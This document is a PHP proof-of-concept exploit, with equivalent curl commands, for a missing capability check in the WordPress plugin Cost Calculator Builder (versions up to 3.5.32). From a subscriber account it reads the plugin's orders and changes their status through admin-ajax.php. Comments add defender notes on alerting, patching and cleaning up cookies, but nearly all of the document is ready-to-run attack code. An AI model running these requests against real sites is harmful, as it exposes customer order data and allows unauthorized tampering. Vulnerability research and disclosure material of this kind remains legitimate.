<?php
/**
* CVE-2025-9243 PoC - Cost Calculator Builder Broken Access Control
* Affected: Cost Calculator Builder <= 3.5.32
* Vulnerability: Missing capability check on get_cc_orders and update_order_status
*/
// Exploit via WordPress AJAX endpoint
// Requires: Authenticated Subscriber-level account
// Placeholder configuration: the host and account used by every request below.
// NOTE(review): credentials are hard-coded in source; files like this must never
// be committed or left in a web-readable directory.
$target_url = 'https://target-wordpress-site.com';
$username = 'subscriber_user';
$password = 'user_password';
// Step 1: Login to obtain authentication cookies and nonce
// POSTs the standard wp-login.php form fields. The session cookies are written to
// cookies.txt (CURLOPT_COOKIEJAR) and replayed on all later requests on the same
// handle (CURLOPT_COOKIEFILE); redirects are followed so the post-login redirect
// to /wp-admin/ is consumed here.
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to'=> $target_url . '/wp-admin/',
'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
// NOTE: $response is never inspected (nor is a false return from curl_exec), so a
// failed login is not detected here; the remaining requests proceed regardless.
// Step 2: Fetch a valid nonce from admin page (or use AJAX nonce)
// GETs WordPress core's `rest-nonce` AJAX action with the stored cookies. Whether the
// plugin handlers below validate this particular nonce, or any nonce, is not
// established by this script. Either way a nonce is a CSRF token, not an
// authorization check: only a capability check (e.g. current_user_can()) in the
// handler enforces the "admin-only" intent that this CVE is about.
$admin_page = $target_url . '/wp-admin/admin-ajax.php?action=rest-nonce';
curl_setopt($ch, CURLOPT_URL, $admin_page);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$nonce = trim(curl_exec($ch));
// Step 3: Exploit - Call get_cc_orders (unauthorized order access)
// POSTs action=get_cc_orders carrying only the subscriber-level session. The raw
// response body is echoed verbatim. Defender note: a POST to admin-ajax.php with
// this action from a session below the administrator role is the event worth
// logging and alerting on; a patched handler should reject it for lacking the
// required capability.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'action' => 'get_cc_orders',
'nonce' => $nonce
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
echo "[+] Fetching orders (should be admin-only):\n";
echo curl_exec($ch) . "\n";
// Step 4: Exploit - Call update_order_status (unauthorized status modification)
// Same handle and cookies; only the POST body changes (CURLOPT_URL/POST persist).
// This is the write primitive: an order's status is changed without the capability
// the operation is meant to require. Mitigation is the same server-side capability
// check, i.e. running a plugin version newer than 3.5.32 (see the header above).
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'action' => 'update_order_status',
'order_id'=> '1',
'status' => 'completed', // Change to any status: pending, processing, completed, cancelled
'nonce' => $nonce
]));
echo "[+] Modifying order status (should be admin-only):\n";
echo curl_exec($ch) . "\n";
// cookies.txt, written in Step 1, is left on disk after the handle is closed;
// it holds a live session cookie and should be removed after use.
curl_close($ch);
?>
# Alternative: curl command-line exploitation
# Same four steps as the PHP script above, driven from a shell. All requests share
# cookies.txt, which holds a live session cookie and should be deleted afterwards.
# Step 1: Login and store cookies
# -c writes the cookie jar, -b reads it; credentials are sent in the POST body
# (placeholders here — never put real ones on a command line, they land in shell history).
curl -c cookies.txt -b cookies.txt \
-d "log=subscriber_user&pwd=password&wp-submit=Log+In&redirect_to=/wp-admin/&testcookie=1" \
https://target-wordpress-site.com/wp-login.php
# Step 2: Get nonce
# Fetches core's rest-nonce AJAX action. A nonce is a CSRF token, not an
# authorization check; the CVE in the header is about the missing capability check,
# which no nonce substitutes for. Whether the plugin accepts this nonce is not
# established here.
NONCE=$(curl -b cookies.txt -s https://target-wordpress-site.com/wp-admin/admin-ajax.php?action=rest-nonce)
# Step 3: Exploit get_cc_orders
# Defender note: POSTs to admin-ajax.php with action=get_cc_orders or
# action=update_order_status from a non-administrator session are the requests to
# log and alert on; a patched handler rejects them on the capability check.
curl -b cookies.txt -d "action=get_cc_orders&nonce=$NONCE" \
https://target-wordpress-site.com/wp-admin/admin-ajax.php
# Step 4: Exploit update_order_status
# The write primitive: changes an order's status without the required capability.
# Remediation is a plugin version newer than 3.5.32 (per the header above).
curl -b cookies.txt -d "action=update_order_status&order_id=1&status=completed&nonce=$NONCE" \
https://target-wordpress-site.com/wp-admin/admin-ajax.php